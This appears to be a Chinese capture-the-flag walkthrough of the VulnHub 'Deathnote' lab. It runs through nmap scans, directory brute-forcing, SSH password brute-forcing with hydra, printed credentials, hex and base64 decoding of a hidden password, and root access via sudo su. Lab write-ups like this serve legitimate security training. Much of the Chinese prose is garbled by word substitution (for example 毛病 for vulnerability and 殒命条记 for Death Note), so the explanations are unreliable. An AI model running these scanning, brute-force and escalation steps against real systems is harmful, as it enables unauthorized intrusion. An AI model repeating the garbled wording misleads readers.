vulnhub靶场Deathnote

Deathnote

主机发现

本地捏造机摆设，攻击机kali(IP:172.16.16.101)

1. sudo nmap -sn -T4 172.16.16.0/24

复制代码

发现目的机IP(172.16.16.103)
新建文件夹，并进入目次，用来存储扫描结果

1. mkdir -p ~/vulnhub/deathnote/nmap_output

复制代码

端口扫描

TCP扫描

1. cd ~/vulnhub/deathnote

复制代码

1. sudo nmap --min-rate 10000 -p- 172.16.16.103 -oA nmap_output/ports

复制代码

具体信息扫描

1. sudo nmap -sS -n -Pn -p 22,80,1 -sV -sC -O 172.16.16.103 -oA nmap_output/detail

复制代码

UDP扫描

1. sudo nmap -sU --top-ports 100 172.16.16.103 -oA nmap_output/udp

复制代码

毛病脚本扫描

1. sudo nmap --script=vuln -p22,80 172.16.16.103 -oA nmap_output/vuln

复制代码

信息总结

1. 目标主机172.16.16.103
2. 开放TCP端口22,80端口
3. 22/tcp   ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
4. 80/tcp   http        Apache httpd 2.4.38 ((Debian))
5. 系统版本
6. Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)                # OpenWrt是一个开源linux系统，主要用于路由器等嵌入式设备
7. UDP端口目前无实际利用价值
8. 默认脚本漏洞扫描无可用结果
9. 但是80端口暴露出 /wordpress/        /robots.txt                /wordpress/wp-login.php                /manual/        等文件或目录

复制代码

WEB

1. http://172.16.16.103

复制代码

访问后好像发生了跳转，且网页有些非常，启动burpsuite检察

直接跳转域名deathnote.vuln
添加本机hosts，将域名deathnote.vuln指向172.16.16.103

1. sudo echo '172.16.16.103 deathnote.vuln' >> /etc/hosts

复制代码

或：

1. sudo sed -i '1i 172.16.16.103 deathnote.vuln' /etc/hosts

复制代码

重新访问，跳转到WordPress正常页面

目次扫描

gobuster

1. gobuster dir -u http://deathnote.vuln/wordpress/ -a "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" -x php,txt,jsp,asp,zip,tar,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

复制代码

feroxbuster

1. feroxbuster -u http://deathnote.vuln/ -a "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" -x txt -d 0 -s 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

复制代码

feroxbuster工具大概不恰当这种场景，无法过滤非txt后缀的文件，要么必要添加正则去筛选，比力贫苦
检察各种已扫描到的网页，提示去找notes.txt大概去看L的品评

固然知道notes.txt文件名，但是不知道具体在哪个路径，以是必要思量递归爆破，还要过滤其他文件
我对比了10款常用的目次爆破工具，发现现在的场景最恰当的工具是ffuf大概dirsearch
具体的10款常用的目次爆破工具各自的特点和实用场景，请看我另一篇漫笔
https://www.cnblogs.com/syslogd/p/19607360
dirsearch

1. python dirsearch.py -r -u http://deathnote.vuln

复制代码

颠末几个小时的等候，发现一些故意思的路径

1. http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt

复制代码

http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/
这个路径大概有东西

根据上面nmap扫描的ssh端口，可以判断走ssh爆破
先存储这两个文件

1. wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/user.txt
2. wget http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt

复制代码

联合WEB页面的信息，推测L和KIRA都大概是用户
SQL注入

/wordpress/wp-login.php

颠末几轮注入，发现注入失败，大概没有注入毛病
ssh爆破

hydra

1. hydra -t4 -L ~/vulnhub/deathnote/user.txt -P ~/vulnhub/deathnote/notes.txt ssh://172.16.16.103

复制代码

1. login:l   password:death4me

复制代码

ssh登录

1. ssh l@172.16.16.103
2. death4me

复制代码

user_flag

一串未知的字符

1. ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++.<<++.>>+++++++++++.------------.+.+++++.---.<<.>>++++++++++.<<.>>--------------.++++++++.+++++.<<.>>.------------.---.<<.>>++++++++++++++.-----------.---.+++++++..<<.++++++++++++.------------.>>----------.+++++++++++++++++++.-.<<.>>+++++.----------.++++++.<<.>>++.--------.-.++++++.<<.>>------------------.+++.<<.>>----.+.++++++++++.-------.<<.>>+++++++++++++++.-----.<<.>>----.--.+++..<<.>>+.--------.<<.+++++++++++++.>>++++++.--.+++++++++.-----------------.

复制代码

丢个AI表明说是Brainfuck语言编写的步调，输出结果为：i think u got the shell, but you wont be able to kill me -kira

sudo权限检察

1. sudo -l
2. death4me

复制代码

无权限
用户信息

1. cat /etc/passwd
2. ls -al /home

复制代码

可以大概登岸的有：root        kira        L
翻找文件

1. /opt/L/fake-notebook-rule

复制代码

该目次下有2个文件case.wav        hint（"提示"）

检察文件范例

1. file case.wav hint

复制代码

都是ASCII字符
检察文件内容

1. cat case.wav

复制代码

一串16进制字符
xxd转换字符

1. echo |cat case.wav |xxd -r -p

复制代码

很像base64
base64解码

1. echo |cat case.wav |xxd -r -p |base64 -d

复制代码

大概是kira用户的暗码：kiraisevil
实验登录

1. ssh kira@172.16.16.103
2. kiraisevil

复制代码

乐成登录kira用户

user2_flag

base64转换

1. echo |cat kira.txt |base64 -d

复制代码

/opt/目次刚才已经检察了，/var/目次下面有什么？Misa又是谁？
回看靶机的名字：deathnote，殒命条记
Misa正是日本漫画《殒命条记》女主角，由平野绫配音，被粉丝称为MisaMisa

进入/var/目次

检察文件

shadow备份文件没有读取权限
提权

sudo提权

检察sudo权限

1. sudo -l
2. kiraisevil

复制代码

(ALL : ALL) ALL        表现可以以root权限实行全部下令
以是直接举行提权到root

1. sudo su

复制代码

root_flag

免责声明：如果侵犯了您的权益，请联系站长及时删除侵权内容，谢谢合作！qidao123.com:ToB企服之家，中国第一个企服评测及软件市场,开放入驻,技术点评得现金.